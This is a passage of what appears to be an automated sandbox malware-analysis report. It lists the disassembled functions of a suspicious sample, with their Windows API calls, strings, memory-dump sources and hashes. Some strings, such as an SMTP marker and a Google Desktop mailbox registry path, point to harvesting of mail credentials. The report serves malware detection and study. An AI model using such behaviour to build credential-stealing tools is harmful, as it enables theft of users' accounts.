                                                                                                              • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                              • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                              Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID: winRead
                                                                                                              • API String ID: 1297977491-2759563040
                                                                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                              Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0044955B
                                                                                                              • memset.MSVCRT ref: 0044956B
                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID: gj
                                                                                                              • API String ID: 1297977491-4203073231
                                                                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                              Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetParent.USER32(?), ref: 004090C2
                                                                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                                              • String ID:
                                                                                                              • API String ID: 4247780290-0
                                                                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                              Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _strcmpi.MSVCRT ref: 0040E134
                                                                                                              • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                              • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _strcmpi$_mbscpy
                                                                                                              • String ID: smtp
                                                                                                              • API String ID: 2625860049-60245459
                                                                                                              • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                              • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                              Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                              • memset.MSVCRT ref: 00408258
                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                              Strings
                                                                                                              • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$EnumOpenmemset
                                                                                                              • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                              • API String ID: 2255314230-2212045309
                                                                                                              • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                              • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                              • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                              • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                              Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040C28C
                                                                                                              • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FocusMessagePostmemset
                                                                                                              • String ID: S_@$l
                                                                                                              • API String ID: 3436799508-4018740455
                                                                                                              • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                              • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                              Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscpy
                                                                                                              • String ID: C^@$X$ini
                                                                                                              • API String ID: 714388716-917056472
                                                                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                              • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                              Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                              • String ID: MS Sans Serif
                                                                                                              • API String ID: 3492281209-168460110
                                                                                                              • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                              • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                              Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassName_strcmpimemset
                                                                                                              • String ID: edit
                                                                                                              • API String ID: 275601554-2167791130
                                                                                                              • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                              • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                              Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strlen$_mbscat
                                                                                                              • String ID: 3CD
                                                                                                              • API String ID: 3951308622-1938365332
                                                                                                              • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                              • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                              Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1860491036-0
                                                                                                              • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                              • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                              Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040D2C2
                                                                                                              • memset.MSVCRT ref: 0040D2D8
                                                                                                              • memset.MSVCRT ref: 0040D2EA
                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                              • memset.MSVCRT ref: 0040D319
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$memcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 368790112-0
                                                                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                              Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                              • too many SQL variables, xrefs: 0042C6FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset
                                                                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                              • API String ID: 2221118986-515162456
                                                                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                              Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                              • strlen.MSVCRT ref: 0040B60B
                                                                                                              • atoi.MSVCRT(?,00000000,?,771B0A60,?,00000000), ref: 0040B619
                                                                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 4107816708-0
                                                                                                              • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                              • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                              Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                              • _gmtime64.MSVCRT ref: 00411437
                                                                                                              • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                              • strftime.MSVCRT ref: 00411476
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                              • String ID:
                                                                                                              • API String ID: 1886415126-0
                                                                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                              Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strlen
                                                                                                              • String ID: >$>$>
                                                                                                              • API String ID: 39653677-3911187716
                                                                                                              • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                              • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                              Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                              • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: @
                                                                                                              • API String ID: 3510742995-2766056989
                                                                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                              Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
